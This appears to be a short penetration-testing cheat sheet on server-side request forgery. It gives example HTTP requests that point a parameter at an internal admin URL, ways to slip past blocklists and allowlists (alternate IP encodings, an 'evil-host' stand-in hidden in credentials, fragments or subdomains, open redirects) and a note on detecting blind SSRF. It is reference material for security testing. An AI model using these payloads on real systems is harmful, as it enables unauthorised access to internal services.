Server-side request forgery (SSRF)

In computer security, server-side request forgery (SSRF) is a type of exploit where an attacker abuses the functionality of a server causing it to access or manipulate information in the realm of that server that would otherwise not be directly accessible to the attacker.

-- Wikipedia

SSRF attacks against the server itself

When a web app passes a url (e.g. to a product) in a request, you may be able to arbitrarily change that url, and therefore make the server request that resource. As the request is issed by the server itself, you may be able to access resources that are unreachable from outside.

POST /some/url HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

someParam=http://192.168.0.42/admin

Bypass filter

Blocklists

  • Using alternate ip representation of 127.0.0.1, like 2130706433 (decimal) or 017700000001 (octal).

  • Registering own domain that resolves to 127.0.0.1

  • Using (double) URL encoding or case variations.

Allowlists

  • Using embedded credentials: https://expected-host@evil-host

  • Using fragments: https://evil-host#expected-host

  • Leverage DNS naming hierarchy, using a domain that you control: https://expected-host.evil-host

  • Combinations of all those techniques

Via open redirect vulnerability

If you find an open redirect vulnerability, you may be able to bypass filters using that.

POST /some/url HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1337

someParam=/some/url?path=http://192.168.0.42/admin

Blind SSRF

Blind SSRF can be detected most reliable using out-of-band (OAST) techniques, e.g. using Burp Collaborator.

E.g. passing a url via Referer header, that is then being requested by the server.

Last updated